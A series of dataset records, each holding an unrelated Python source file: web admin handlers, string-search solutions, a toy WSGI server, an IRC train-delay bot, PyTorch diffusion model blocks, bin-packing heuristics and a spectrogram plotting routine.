return classifiers_NCD, 
names_NCD, bagging_NCD, max_features_NCD, max_samples_NCD\n if risk_level == 'NNC':\n return classifiers_NNC, names_NNC, bagging_NNC, max_features_NNC, max_samples_NNC","sub_path":"Contenuto nuovo/Testing Clustered Oversampling (class A and B)/SKLearn.py","file_name":"SKLearn.py","file_ext":"py","file_size_in_byte":24277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"428438427","text":"from subject_page import *\r\nfrom action_query import ActionQuery\r\n\r\nclass huodong(BaseSubject):\r\n def __init__(self):\r\n BaseSubject.__init__(self)\r\n\r\n def execute(self):\r\n if self.loginUser == None:\r\n return self.LOGIN\r\n\r\n if self.isAdmin == False and self.isContentAdmin() == False:\r\n self.addActionError(u\"You do not have management permission!\")\r\n return self.ERROR\r\n \r\n if request.getMethod() == \"POST\":\r\n self.post_action()\r\n self.clear_subject_cache()\r\n \r\n return self.action_list()\r\n \r\n def action_list(self):\r\n qry = ActionQuery(\"\"\" act.actionId, act.title, act.ownerType, act.ownerId, act.createDate, act.startDateTime,\r\n act.finishDateTime, act.createUserId, act.actionType, act.status \"\"\")\r\n qry.ownerId = self.subject.subjectId\r\n qry.ownerType = \"subject\"\r\n qry.status = None\r\n pager = self.params.createPager()\r\n pager.itemName = u\"activity\"\r\n pager.itemUnit = u\"item\"\r\n pager.pageSize = 25\r\n pager.totalRows = qry.count()\r\n action_list = qry.query_map(pager)\r\n request.setAttribute(\"subject\", self.subject)\r\n request.setAttribute(\"action_list\", action_list)\r\n return \"/WEB-INF/subjectmanage/action.ftl\"\r\n \r\n def post_action(self):\r\n act_svc = __spring__.getBean(\"actionService\")\r\n cmd = self.params.safeGetStringParam(\"cmd\")\r\n if cmd == \"\":\r\n action_status = -200\r\n else:\r\n action_status = int(cmd) \r\n guids = self.params.safeGetIntValues(\"guid\")\r\n for id in guids:\r\n action = act_svc.getActionById(id)\r\n if action != None:\r\n if action_status == -2:\r\n act_svc.deleteAction(action)\r\n else:\r\n act_svc.updateActionStatus(action_status, id)\r\n","sub_path":"WebContent/subject/manage/huodong.py","file_name":"huodong.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"60426890","text":"class Solution():\n @staticmethod\n def strStr(source, target):\n # write your code here\n if source is None or target is None:\n return -1\n\n if source == target:\n return 0\n\n if target == \"\":\n return 0\n\n l_source = list(source)\n l_target = list(target)\n for i, s in enumerate(l_source):\n match = False\n if l_target[0] == s:\n if i + len(l_target) > len(l_source):\n return -1\n for j, t in enumerate(l_target):\n if t != l_source[i+j]:\n break\n if j == len(l_target) - 1:\n match = True\n\n if match:\n return i\n\n return -1\n\nclass Solution1():\n @staticmethod\n def strStr1(source, target):\n if source is None or target is None:\n return -1\n\n if source == target:\n return 0\n\n if target == \"\":\n return 0\n\n if len(source) < len(target):\n return -1\n\n slist = list(source)\n tlist = list(target)\n\n t_len = len(tlist)\n for i in range(len(source)):\n if source[i:i+t_len] == target:\n return i\n\n return -1\n\nclass Solution2:\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n if haystack is None or needle is None:\n return -1\n\n if haystack == needle:\n return 0\n\n if needle == \"\":\n return 0\n\n if haystack == \"\":\n return -1\n\n 
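# NOTE: exact equality was handled above, so a needle as long as the haystack can\n # no longer match, which makes the <= comparison below safe.\n 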
if len(haystack) <= len(needle):\n return -1\n\n hlist = list(haystack)\n nlist = list(needle)\n pos = -1\n for i, h in enumerate(hlist):\n if h != nlist[0]:\n continue\n if i + len(nlist) > len(hlist): # the needle can no longer fit from this position on\n return -1\n pos = i\n for j in range(1, len(nlist)):\n if i + j >= len(hlist) or hlist[i+j] != nlist[j]:\n pos = -1\n break\n if pos != -1:\n return pos\n\n return pos\n\nif __name__ == \"__main__\":\n sln = Solution2()\n res = sln.strStr(\"mississippi\", \"pi\")\n print(res)","sub_path":"leet/source/string/strStr.py","file_name":"strStr.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"111409621","text":"import os\nfrom lib.tactic_base_script import TacticBaseScript\nfrom lib.tactic_server import active_server\n\nclass ExportMaxPosition(TacticBaseScript):\n \"\"\"\n Export max position from tactic to a file that will be used by the publishing\n scripts of the web application\n \"\"\"\n\n def getMaxPositionMapping(self, locator):\n return {\n 'flexstrip': 'strip',\n 'hanging' :'ceiling',\n 'hla' :'table',\n 'inceiling':'ceiling',\n 'infloor': 'floor',\n 'inwall': 'wall',\n 'onceiling': 'ceiling',\n 'onfloor': 'floor',\n 'ontable': 'table',\n 'onwall': 'wall',\n 'pedestal': 'floor',\n 'strip': 'strip',\n }[locator]\n\n def execute(self):\n max_locator_types = ['flexstrip','hanging','hla', 'inceiling',\n 'infloor','inwall', 'onceiling','onfloor',\n 'ontable', 'onwall', 'pedestal', 'strip']\n #exportFile = self.server.create_and_open_file('export_max_position')\n with self.server.create_and_open_file('export_max_position') as exportFile:\n with self.transaction() as session:\n for luminaire in session.get_all_luminaires(show_retired = True):\n max_locator_type = luminaire.get('max_locator_type')\n if max_locator_type in max_locator_types:\n locator = self.getMaxPositionMapping(max_locator_type)\n for ctn9 in luminaire.get_ctn9_list():\n exportFile.write(\"{0},{1}\\n\".format(ctn9, locator))\n\nif __name__ == '__main__':\n ExportMaxPosition.run(active_server())\n","sub_path":"python_scripts/cron_jobs/export_max_positions.py","file_name":"export_max_positions.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"347960800","text":"# coding=utf-8\n\nfrom tornado import gen\nfrom service.page.base import PageService\nfrom util.common import ObjectDict\n\n\nclass CaptchaPageService(PageService):\n\n def __init__(self):\n super().__init__()\n\n @gen.coroutine\n def post_verification(self, captcha, channel, account_id, position_id, param_id):\n \"\"\"\n :param captcha: the verification code\n :param channel: id of the call-back platform: 1 前程无忧 (51job), 2 猎聘 (Liepin), 3 智联 (Zhaopin), 6 最佳东方 (Veryeast), 7 一览英才 (YL1001)\n :param account_id: ID of the third-party channel account\n :param position_id: position ID\n :param param_id:\n :return:\n \"\"\"\n\n req = ObjectDict({\n 'info': captcha,\n 'channel': channel,\n 'accountId': account_id,\n 'positionId': position_id,\n 'paramId': param_id\n })\n res = yield self.infra_captcha_ds.post_verification(req)\n status, message = res.status, res.message\n return status, message\n\n @gen.coroutine\n def get_verification_params(self, param_id):\n \"\"\"\n Fetch the parameters needed to build the verification page\n :param param_id:\n :return:\n \"\"\"\n req = ObjectDict({'paramId': param_id})\n res = yield self.infra_captcha_ds.get_verification_params(req)\n message, data, status = res.message, res.data, res.status\n ret = ObjectDict()\n if data:\n ret['channel'] = data.channel\n ret['accountId'] = data.accountId\n ret['mobile'] = 
data.mobile\n ret['positionId'] = data.positionId\n return message, ret, status\n\n\n","sub_path":"service/page/captcha/captcha.py","file_name":"captcha.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"160393936","text":"from socket import *\nfrom multiprocessing import *\nimport re\nimport sys\n\nWSGI_PYTHON_DIR = \"/home/banban/web\"\n\nclass HTTP(object):\n\tdef __init__(self, app):\n\t\tself.server_socket = socket(AF_INET, SOCK_STREAM)\n\t\tself.server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\t\tself.app = app\n\n\tdef start(self):\n\t\tself.server_socket.listen(128)\n\t\t# accept clients in a loop; each connection is handled in a child process\n\t\twhile True:\n\t\t\tclient_socket, client_addr = self.server_socket.accept()\n\t\t\tprint(\"newcomer\" + str(client_addr))\n\t\t\tclient_process = Process(target = self.handle_client, args = (client_socket,))\n\t\t\tclient_process.start()\n\t\t\tclient_socket.close()\n\n\tdef bind(self, port):\n\t\tself.server_socket.bind((\"\",port))\n\n\tdef handle_client(self, client_socket):\n\t\tclient_data = client_socket.recv(1024)\n\t\tclient_line = client_data.splitlines()\n\t\tclient_start_line = client_line[0].decode(\"utf-8\")\n\t\trequire_name = re.match(r\"\\w+ +(/[^ ]*) \", client_start_line).group(1)\n\t\tenv = {\n\t\t\t\"PATH\" : require_name\n\t\t}\n\t\tresponse_body = self.app(env, self.start_response)\n\t\tresponse = self.response_headers + \"\\r\\n\" + response_body\n\t\tclient_socket.send(bytes(response, \"utf-8\"))\n\t\tclient_socket.close()\n\n\tdef start_response(self, status, headers):\n\t\tresponse_headers = \"HTTP/1.1 \" + status + \"\\r\\n\" \n\t\tfor header in headers:\n\t\t\tresponse_headers += \"%s:%s\\r\\n\"%header\n\t\tself.response_headers = response_headers\n\ndef main():\n\tsys.path.insert(1, WSGI_PYTHON_DIR)\n\tmodule_name, app_name = sys.argv[1].split(\":\")\n\tm = __import__(module_name)\n\tapp = getattr(m, app_name)\n\thttp = HTTP(app)\n\thttp.bind(8888)\n\thttp.start()\n\nif __name__ == '__main__':\n\tmain()\t\t\n","sub_path":"web/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"70502122","text":"import asyncio\nfrom ircbot.plugin import BotPlugin\nfrom datetime import datetime, timedelta\nfrom datetime import time as dtime\nimport itertools\nimport functools\nimport aiohttp\n\nCENTRAL = \"Brussels-Central\"\nCHAPELLE = \"Brussels-Chapelle/Brussels-Kapellekerk\"\n\nTRAIN_TIMES = [\n (dtime( 7, 15), dtime( 8, 15), CENTRAL, \"S11778\"), # 07:51\n (dtime( 8, 15), dtime( 9, 15), CENTRAL, \"S11779\"), # 08:51\n (dtime( 9, 15), dtime(10, 15), CENTRAL, \"S11780\"), # 09:52\n (dtime(10, 15), dtime(11, 15), CENTRAL, \"S11781\"), # 10:52\n (dtime(11, 15), dtime(12, 15), CENTRAL, \"S11782\"), # 11:52\n\n (dtime(15, 15), dtime(16, 15), CHAPELLE, \"S11765\"), # 16:06\n (dtime(16, 15), dtime(17, 15), CHAPELLE, \"S11766\"), # 17:06\n (dtime(17, 15), dtime(18, 15), CHAPELLE, \"S11767\"), # 18:05\n (dtime(18, 15), dtime(19, 20), CHAPELLE, \"S11768\"), # 19:05\n]\n\nRULES = {\n 'train_morning': [\n {\"hour\": [9], \"minute\": [40, 50], \"weekday\": [0, 1, 2, 3, 4]},\n ],\n 'train_evening': [\n {\"hour\": [17], \"minute\": [49, 59], \"weekday\": [0, 1, 2, 3, 4]},\n ],\n # 'metro': [\n # {\"hour\": [9], \"minute\": [15], \"weekday\": [1, 2, 3, 4, 5]},\n # ],\n}\n\n\ndef next_day(weekday, hour=0, minute=0, second=0):\n now = datetime.now()\n d_days = (weekday - now.weekday()) % 7\n 
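# e.g. on a Wednesday (weekday() == 2), next_day(0, 9, 40) gives d_days = 5 and\n # lands on the coming Monday at 09:40; if the target time today is already past,\n # a full week is added below.\n 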
day = now + timedelta(days=d_days)\n if d_days == 0 and dtime(hour, minute, second) < now.time():\n day += timedelta(days=7)\n return day.replace(hour=hour, minute=minute, second=second, microsecond=0)\n\n\nclass StationMaster(BotPlugin):\n def __init__(self):\n self.loop = asyncio.get_event_loop()\n\n def get_next_instant(self, event_type):\n rules = RULES[event_type]\n expanded_rules = itertools.chain(*(\n itertools.product(rule[\"weekday\"], rule[\"hour\"], rule['minute'])\n for rule in rules\n ))\n expanded_rules = list(expanded_rules)\n days = [next_day(*rule) for rule in expanded_rules]\n return min(days)\n\n def event(self, event_type):\n self.set_next_call(event_type)\n fun = getattr(self, \"run_%s\" % event_type)\n assert asyncio.iscoroutinefunction(fun)\n asyncio.ensure_future(fun())\n\n @asyncio.coroutine\n def run_train_morning(self):\n station = \"Brussels-Central\"\n train = \"S11780\"\n data = yield from self.get_delay(train, station)\n self.say(self.format_train(train, data))\n\n @asyncio.coroutine\n def run_train_evening(self):\n station = \"Brussels-Chapelle/Brussels-Kapellekerk\"\n train = \"S11767\"\n data = yield from self.get_delay(train, station)\n if data['delay'] < 5 or (data['scheduled_departure'] - datetime.now()) < timedelta(minutes=10):\n # Skip noise if no or little delay and departure is in the \"far\" future\n self.say(self.format_train(train, data))\n\n def get_delay(self, train_id, station):\n url = \"https://api.irail.be/vehicle/?id=BE.NMBS.%s&format=json\" % train_id\n\n response = yield from aiohttp.get(url)\n data = yield from response.json()\n stops = [s for s in data[\"stops\"][\"stop\"] if s[\"station\"] == station]\n if len(stops) != 1:\n raise Exception(\"Expected exactly one %s stop\" % station)\n stop = stops[0]\n departure = datetime.fromtimestamp(int(stop['scheduledDepartureTime']))\n return {\n \"canceled\": stop[\"departureCanceled\"] != \"0\",\n \"delay\": round(int(stop[\"departureDelay\"]) / 60),\n \"platform\": stop['platform'],\n \"is_normal_platform\": stop['platforminfo']['normal'] == \"1\",\n \"scheduled_departure\": departure,\n }\n\n def set_next_call(self, event_type):\n at = self.get_next_instant(event_type)\n dt = (at - datetime.now()).total_seconds()\n self.loop.call_at(\n self.loop.time() + dt,\n functools.partial(self.event, event_type)\n )\n\n @BotPlugin.on_connect\n def boot(self):\n for event_type in RULES.keys():\n self.set_next_call(event_type)\n\n def format_train(self, train, data):\n if data['canceled']:\n status_txt = \"is \" + self.bot.text.bold(self.bot.text.red(\"cancelled ❌\"))\n elif data['delay'] > 0:\n status_txt = 'is running ' + self.bot.text.yellow('%s min late' % data['delay'])\n else:\n status_txt = 'is ' + self.bot.text.green('on time')\n\n if data[\"is_normal_platform\"]:\n platform_txt = \"\"\n else:\n platform_txt = self.bot.text.red(\"🚉 Platform change: platform %s.\" % data['platform'])\n\n return \"The %s at %s %s. 
%s\" % (\n train[:2],\n data['scheduled_departure'].strftime(\"%H:%M\"),\n status_txt,\n platform_txt\n )\n\n @BotPlugin.command(r'\\!teleport')\n def teleport(self, msg):\n has_ran = False\n for start, stop, station, train in TRAIN_TIMES:\n if start < datetime.now().time() < stop:\n has_ran = True\n data = yield from self.get_delay(train, station)\n msg.reply(self.format_train(train, data))\n\n if not has_ran:\n msg.reply(\"Aucun téléporteur n'est disponible pour l'instant...\")\n","sub_path":"plugins/station_master.py","file_name":"station_master.py","file_ext":"py","file_size_in_byte":5238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161496045","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch.nn import functional as F\nimport math\n\n\nclass Mish(nn.Module):\n def forward(self, x):\n return x * torch.tanh(F.softplus(x))\n\n\nclass DiffusionEmbedding(nn.Module):\n \"\"\" Diffusion Step Embedding \"\"\"\n\n def __init__(self, d_denoiser):\n super(DiffusionEmbedding, self).__init__()\n self.dim = d_denoiser\n\n def forward(self, x):\n device = x.device\n half_dim = self.dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, device=device) * -emb)\n emb = x[:, None] * emb[None, :]\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\nclass ResidualBlock(nn.Module):\n \"\"\" Residual Block \"\"\"\n\n def __init__(self, d_encoder, residual_channels, dropout):\n super(ResidualBlock, self).__init__()\n self.conv_layer = ConvNorm(\n residual_channels,\n 2 * residual_channels,\n kernel_size=3,\n stride=1,\n padding=int((3 - 1) / 2),\n dilation=1,\n )\n self.diffusion_projection = LinearNorm(residual_channels, residual_channels)\n self.conditioner_projection = ConvNorm(\n d_encoder, 2 * residual_channels, kernel_size=1 \n )\n self.output_projection = ConvNorm(\n residual_channels, 2 * residual_channels, kernel_size=1 \n )\n\n def forward(self, x, conditioner, diffusion_step, mask=None):\n\n diffusion_step = self.diffusion_projection(diffusion_step).unsqueeze(-1)\n conditioner = self.conditioner_projection(conditioner)\n\n y = x + diffusion_step\n y = self.conv_layer(y) + conditioner\n\n gate, filter = torch.chunk(y, 2, dim=1)\n y = torch.sigmoid(gate) * torch.tanh(filter)\n\n y = self.output_projection(y)\n residual, skip = torch.chunk(y, 2, dim=1)\n\n return (x + residual) / math.sqrt(2.0), skip\n\n\nclass LinearNorm(nn.Module):\n \"\"\" LinearNorm Projection \"\"\"\n\n def __init__(self, in_features, out_features, bias=False):\n super(LinearNorm, self).__init__()\n self.linear = nn.Linear(in_features, out_features, bias)\n\n nn.init.xavier_uniform_(self.linear.weight)\n if bias:\n nn.init.constant_(self.linear.bias, 0.0)\n \n def forward(self, x):\n x = self.linear(x)\n return x\n\n\nclass ConvBlock(nn.Module):\n \"\"\" Convolutional Block \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size, dropout, activation=nn.ReLU()):\n super(ConvBlock, self).__init__()\n\n self.conv_layer = nn.Sequential(\n ConvNorm(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n stride=1,\n padding=int((kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"tanh\",\n ),\n nn.BatchNorm1d(out_channels),\n activation\n )\n self.dropout = dropout\n self.layer_norm = nn.LayerNorm(out_channels)\n\n def forward(self, enc_input, mask=None):\n enc_output = enc_input.contiguous().transpose(1, 2)\n enc_output = F.dropout(self.conv_layer(enc_output), self.dropout, 
enc_output = F.dropout(self.conv_layer(enc_output), self.dropout, self.training)\n\n enc_output = self.layer_norm(enc_output.contiguous().transpose(1, 2))\n if mask is not None:\n enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0)\n\n return enc_output\n\n\nclass ConvNorm(nn.Module):\n \"\"\" 1D Convolution \"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n kernel_size=1,\n stride=1,\n padding=None,\n dilation=1,\n bias=True,\n w_init_gain=\"linear\",\n ):\n super(ConvNorm, self).__init__()\n\n if padding is None:\n assert kernel_size % 2 == 1\n padding = int(dilation * (kernel_size - 1) / 2)\n\n self.conv = nn.Conv1d(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n bias=bias,\n )\n nn.init.kaiming_normal_(self.conv.weight)\n\n def forward(self, signal):\n conv_signal = self.conv(signal)\n\n return conv_signal\n\n\nclass FFTBlock(nn.Module):\n \"\"\" FFT Block \"\"\"\n\n def __init__(self, d_model, n_head, d_k, d_v, d_inner, kernel_size, dropout=0.1):\n super(FFTBlock, self).__init__()\n self.slf_attn = MultiHeadAttention(n_head, d_model, d_k, d_v, dropout=dropout)\n self.pos_ffn = PositionwiseFeedForward(\n d_model, d_inner, kernel_size, dropout=dropout\n )\n\n def forward(self, enc_input, mask=None, slf_attn_mask=None):\n enc_output, enc_slf_attn = self.slf_attn(\n enc_input, enc_input, enc_input, mask=slf_attn_mask\n )\n if mask is not None:\n enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0)\n\n enc_output = self.pos_ffn(enc_output)\n if mask is not None:\n enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0)\n\n return enc_output, enc_slf_attn\n\n\nclass MultiHeadAttention(nn.Module):\n \"\"\" Multi-Head Attention \"\"\"\n\n def __init__(self, n_head, d_model, d_k, d_v, dropout=0.1):\n super(MultiHeadAttention, self).__init__()\n\n self.n_head = n_head\n self.d_k = d_k\n self.d_v = d_v\n\n self.w_qs = LinearNorm(d_model, n_head * d_k)\n self.w_ks = LinearNorm(d_model, n_head * d_k)\n self.w_vs = LinearNorm(d_model, n_head * d_v)\n\n self.attention = ScaledDotProductAttention(temperature=np.power(d_k, 0.5))\n self.layer_norm = nn.LayerNorm(d_model)\n\n self.fc = LinearNorm(n_head * d_v, d_model)\n\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, q, k, v, mask=None):\n\n d_k, d_v, n_head = self.d_k, self.d_v, self.n_head\n\n sz_b, len_q, _ = q.size()\n sz_b, len_k, _ = k.size()\n sz_b, len_v, _ = v.size()\n\n residual = q\n\n q = self.w_qs(q).view(sz_b, len_q, n_head, d_k)\n k = self.w_ks(k).view(sz_b, len_k, n_head, d_k)\n v = self.w_vs(v).view(sz_b, len_v, n_head, d_v)\n q = q.permute(2, 0, 1, 3).contiguous().view(-1, len_q, d_k) # (n*b) x lq x dk\n k = k.permute(2, 0, 1, 3).contiguous().view(-1, len_k, d_k) # (n*b) x lk x dk\n v = v.permute(2, 0, 1, 3).contiguous().view(-1, len_v, d_v) # (n*b) x lv x dv\n\n if mask is not None: # guard: callers such as FFTBlock may pass mask=None\n mask = mask.repeat(n_head, 1, 1) # (n*b) x lq x lk — tile the mask once per head\n 
x ..\n output, attn = self.attention(q, k, v, mask=mask)\n\n output = output.view(n_head, sz_b, len_q, d_v)\n output = (\n output.permute(1, 2, 0, 3).contiguous().view(sz_b, len_q, -1)\n ) # b x lq x (n*dv)\n\n output = self.dropout(self.fc(output))\n output = self.layer_norm(output + residual)\n\n return output, attn\n\n\nclass ScaledDotProductAttention(nn.Module):\n \"\"\" Scaled Dot-Product Attention \"\"\"\n\n def __init__(self, temperature):\n super(ScaledDotProductAttention, self).__init__()\n self.temperature = temperature\n self.softmax = nn.Softmax(dim=2)\n\n def forward(self, q, k, v, mask=None):\n\n attn = torch.bmm(q, k.transpose(1, 2))\n attn = attn / self.temperature\n\n if mask is not None:\n attn = attn.masked_fill(mask, -np.inf)\n\n attn = self.softmax(attn)\n output = torch.bmm(attn, v)\n\n return output, attn\n\n\nclass PositionwiseFeedForward(nn.Module):\n \"\"\" A two-feed-forward-layer \"\"\"\n\n def __init__(self, d_in, d_hid, kernel_size, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n\n # Use Conv1D\n # position-wise\n self.w_1 = nn.Conv1d(\n d_in,\n d_hid,\n kernel_size=kernel_size[0],\n padding=(kernel_size[0] - 1) // 2,\n )\n # position-wise\n self.w_2 = nn.Conv1d(\n d_hid,\n d_in,\n kernel_size=kernel_size[1],\n padding=(kernel_size[1] - 1) // 2,\n )\n\n self.layer_norm = nn.LayerNorm(d_in)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n residual = x\n output = x.transpose(1, 2)\n output = self.w_2(F.relu(self.w_1(output)))\n output = output.transpose(1, 2)\n output = self.dropout(output)\n output = self.layer_norm(output + residual)\n\n return output\n","sub_path":"model/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":8465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610106802","text":"import numpy as np\nimport random\n\nkarten = np.random.randint(1, 5, size=100000)\n\nclass zufall_ohne:\n def __init__(self):\n self.zufall = [1,2,3,4]\n \n def ziehen_ohne(self):\n entfernt = random.choice(self.zufall)\n self.zufall.remove(entfernt)\n return (entfernt)\n\neinzel = False\nstatistik = {'erster':0, 'zweiter':0, 'dritter':0 ,'vierter':0}\nspielrunden = 0\nfor i in karten:\n spieler = zufall_ohne()\n if einzel: \n print(\"Schwarze Position: \" + str(i))\n erster = spieler.ziehen_ohne()\n if einzel: \n print(\" Erster zieht Karte \" + str(erster))\n if i == erster:\n statistik['erster'] += 1\n spielrunden += 1\n else:\n zweiter = spieler.ziehen_ohne()\n if einzel: \n print(\" Zweiter zieht Karte \" + str(zweiter))\n if i == zweiter:\n statistik['zweiter'] += 1\n spielrunden += 2\n else:\n dritter = spieler.ziehen_ohne()\n if einzel: \n print(\" Dritter zieht Karte \" + str(dritter))\n if i == dritter:\n statistik['dritter'] += 1\n spielrunden += 3\n else:\n vierter = spieler.ziehen_ohne()\n if einzel: \n print(\" Vierter zieht Karte \" + str(vierter))\n if i == vierter:\n statistik['vierter'] += 1\n spielrunden += 4\n if einzel:\n for (key, value) in statistik.items():\n print(' '*6 + key + ': ' + str(value))\n\nfor (key, value) in statistik.items():\n print(key + ': ' + str(round(value/ len(karten),2)* 100) + '%') \n \n\n","sub_path":"Kartenziehen.py","file_name":"Kartenziehen.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"163959784","text":"\"\"\"\nBin Packing Problem (Minimize number of used Bins)\nGiven n items of different weights and bins each 
of capacity c,\nassign each item to a bin such that the total number of used bins is minimized.\nIt may be assumed that all items have weights smaller than bin capacity.\n\nInput: weight[] = {4, 8, 1, 4, 2, 1}\n Bin Capacity c = 10\nOutput: 2\nWe need minimum 2 bins to accommodate all items\nFirst bin contains {4, 4, 2} and second bin {8, 2}\n\nInput: weight[] = {9, 8, 2, 2, 5, 4}\n Bin Capacity c = 10\nOutput: 4\nWe need minimum 4 bins to accommodate all items.\n\nInput: weight[] = {2, 5, 4, 7, 1, 3, 8};\n Bin Capacity c = 10\nOutput: 3\n\nLower Bound\nWe can always find a lower bound on the minimum number of bins required. The lower bound can be given as:\n\n Min no. of bins >= Ceil ((Total Weight) / (Bin Capacity))\n\nIn the above examples, the lower bound for the first example is “ceil(4 + 8 + 1 + 4 + 2 + 1)/10” = 2 and the lower bound in the second example is “ceil(9 + 8 + 2 + 2 + 5 + 4)/10” = 3.\nThis problem is NP Hard and finding an exact minimum number of bins takes exponential time. Following are approximate algorithms for this problem.\n\nApplications\n\nLoading of containers like trucks.\nPlacing data on multiple disks.\nJob scheduling.\nPacking advertisements in fixed length radio/TV station breaks.\nStoring a large collection of music onto tapes/CD’s, etc.\n\n\"\"\"\n\n\nclass Solution:\n    def nextfit(self, weight, c):\n        res = 0\n        rem = c\n        for _ in range(len(weight)):\n            if rem >= weight[_]:\n                rem = rem - weight[_]\n            else:\n                res += 1\n                rem = c - weight[_]\n        return res\n\n    def firstFit(self, weight, n, c):\n\n        # Initialize result (Count of bins)\n        res = 0\n\n        # Create an array to store remaining space in bins\n        # there can be at most n bins\n        bin_rem = [0] * n\n\n        # Place items one by one\n        for i in range(n):\n\n            # Find the first bin that can accommodate\n            # weight[i]\n            j = 0\n\n            # Initialize minimum space left and index\n            # of best bin\n            min = c + 1\n            bi = 0\n\n            for j in range(res):\n                if bin_rem[j] >= weight[i] and bin_rem[j] - weight[i] < min:\n                    bi = j\n                    min = bin_rem[j] - weight[i]\n\n            # If no bin could accommodate weight[i],\n            # create a new bin\n            if min == c + 1:\n                bin_rem[res] = c - weight[i]\n                res += 1\n            else: # Assign the item to best bin\n                bin_rem[bi] -= weight[i]\n        return res\n\n    # Driver Code\n\n\nweight = [2, 5, 4, 7, 1, 3, 8]\nc = 10\nn = len(weight)\nsolution = Solution()\nprint(\"Number of bins required in Next Fit :\", solution.nextfit(weight, c))\nprint(\"Number of bins required in First Fit :\", solution.firstFit(weight, n, c))\n","sub_path":"src/arrays/binPack.py","file_name":"binPack.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
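A quick standalone check of the lower-bound formula quoted in the docstring above (min bins >= ceil(total weight / bin capacity)); the helper name lower_bound is illustrative and the weights are the record's third example:

import math

def lower_bound(weight, c):
    # Min no. of bins >= Ceil((Total Weight) / (Bin Capacity))
    return math.ceil(sum(weight) / c)

print(lower_bound([2, 5, 4, 7, 1, 3, 8], 10))  # 3, matching the expected output above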
{"seq_id":"421378083","text":"# coding=utf-8\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plot_spectrograph(omega_vector, k, plottable_space_time_fft, maximal_omega, title=None):\n    fig, ax = plt.subplots()\n    OMEGA, K = np.meshgrid(omega_vector, k, indexing='ij')\n    CF = ax.contourf(OMEGA, K, plottable_space_time_fft, 500)\n    plt.colorbar(CF)\n    ax.plot(maximal_omega, k, \"ro-\")\n    ax.set_xlabel(\"omega\")\n    ax.set_ylabel(\"k\")\n    ax.grid()\n    if title:\n        ax.set_title(title)\n    return fig\n\n\ndef plot_dispersion_relation(k, maximal_omega, title=None):\n    fig, ax = plt.subplots()\n\n    ax.plot(k, maximal_omega)\n    ax.set_xlabel(\"k\")\n    ax.set_ylabel(\"omega\")\n    ax.grid()\n    if title:\n        ax.set_title(title)\n    return fig\n\n\ndef dispersion_relation(t, x, z, plot_spectro=False, plot_dispersion=False, title=None):\n    # omega as a function of k\n    # for each k\n    # scan all the omegas along axis 0\n    # pick the one with the maximal component\n    # plot it for that k\n    dt = t[1] - t[0]\n    dx = x[1] - x[0]\n    phase_resolution = np.pi * 2\n    k = (np.fft.rfftfreq(x.size, dx)) * 2 * phase_resolution\n    omega_vector = (np.fft.rfftfreq(t.size, dt)) * phase_resolution\n\n    space_time_fft = np.fft.rfft(np.fft.rfft(z, axis=1), axis=0)\n    plottable_space_time_fft = np.log(np.abs(space_time_fft).real)\n\n    \"\"\"\n    signals are:\n    in rows numbered by k_indices\n    IF\n    \"\"\"\n    noise_indices = plottable_space_time_fft < -3\n    analysis_space_time_fft = plottable_space_time_fft.copy()\n    analysis_space_time_fft[noise_indices] = -3\n    maximal_omega_index = np.argmax(analysis_space_time_fft, axis=0)\n    maximal_omega = omega_vector[maximal_omega_index]\n\n    if plot_spectro and plot_dispersion:\n        return plot_spectrograph(omega_vector, k, plottable_space_time_fft, maximal_omega,\n                                 title), plot_dispersion_relation(k, maximal_omega, title)\n\n    if plot_dispersion:\n        return plot_dispersion_relation(k, maximal_omega, title)\n    if plot_spectro:\n        return plot_spectrograph(omega_vector, k, plottable_space_time_fft, maximal_omega, title)\n    return k, maximal_omega\n\n\ndef test_spectrograph():\n    tmax = 1\n    xmax = 12\n    t = np.linspace(0, tmax, 128, endpoint=False)\n    x = np.linspace(0, xmax, 128, endpoint=False)\n\n    T, X = np.meshgrid(t, x, indexing='ij')\n    wavevector = 6 * np.pi\n    omega = 10 * np.pi\n    z = 5 * np.cos(wavevector * X - omega * T) + \\\n        10 * np.sin(8 * np.pi * X - omega * T)\n\n    result_k, result_omega = dispersion_relation(t, x, z, plot_spectro=True, 